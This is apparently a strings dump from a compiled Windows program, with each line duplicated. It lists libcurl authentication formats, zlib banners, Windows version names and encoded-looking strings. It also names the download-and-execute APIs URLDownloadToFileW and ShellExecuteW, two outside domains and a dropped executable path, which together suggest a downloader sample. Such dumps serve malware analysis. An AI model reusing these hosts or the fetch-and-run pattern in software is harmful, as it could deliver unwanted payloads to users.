username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:%s
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, opaque="%s"
%s, algorithm="%s"
%s, algorithm="%s"
user=%s
user=%s
auth=Bearer %s
auth=Bearer %s
Unsupported SASL authentication mechanism
Unsupported SASL authentication mechanism
0123456789-
0123456789-
NTLMSSP%c
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Operation not permitted
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
operator
operator
GetProcessWindowStation
GetProcessWindowStation
curl_global_init failed: %d
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
EEDTFJDVCLHQJLCFIRCYIVDOGJJGAYENHBASDPCAJMIIIQBKAACHEIJTASGJDKBXIOICEBAMESEEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCFIRCYIVDOGJJGAYENHBASDPCAJMIIIQBKAACHEIJTASGJDKBXIOICEBAMESEEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
InternetOpenUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
URLDownloadToFileW
URLDownloadToFileW
ShellExecuteW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
\Release\nmjh.pdb
WLDAP32.dll
WLDAP32.dll
WS2_32.dll
WS2_32.dll
PeekNamedPipe
PeekNamedPipe
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegCloseKey
RegCloseKey
CryptDestroyKey
CryptDestroyKey
CryptImportKey
CryptImportKey
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
IPHLPAPI.DLL
IPHLPAPI.DLL
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
];:6,,((()
];:6,,((()
c.CHauy
c.CHauy
v:\OC
v:\OC
w.Rd&
w.Rd&
.Yxp6g
.Yxp6g
.Xui2\y
.Xui2\y
.Vr{4Yu
.Vr{4Yu
3a~D.Yv
3a~D.Yv
.Cv?f
.Cv?f
.UvUAf
.UvUAf
.UvUBh
.UvUBh
.VwUAi
.VwUAi
.YyUAq
.YyUAq
.YuAO
.YuAO
/F.En
/F.En
.Wx&O|
.Wx&O|
&Qs
&Qs
.Vraz
.Vraz
.Xv
.Xv
6 6$6(6,6064686
6 6$6(6,6064686
5 5$5(5,505
5 5$5(5,505
8@8%9U9Z9
8@8%9U9Z9
0 0$0(0,000
0 0$0(0,000
combase.dll
combase.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
portuguese-brazilian
portuguese-brazilian
USER32.DLL
USER32.DLL
2.cmd
2.cmd
kernel32.dll
kernel32.dll
Gateway:0.0.0.0
Gateway:0.0.0.0
c:\Program Files\
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
wininet.dll
wininet.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
urlmon.dll
urlmon.dll
s.tianyuanjyh.com
s.tianyuanjyh.com
shell32.dll
shell32.dll
VVV.yytv8.com
VVV.yytv8.com
%d-%d-%d
%d-%d-%d
%d-%d-%d-%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\uuuyunbo_53_1248.exe
C:\uuuyunbo_53_1248.exe
1.0.0.1
1.0.0.1
YunBOWin.exe
YunBOWin.exe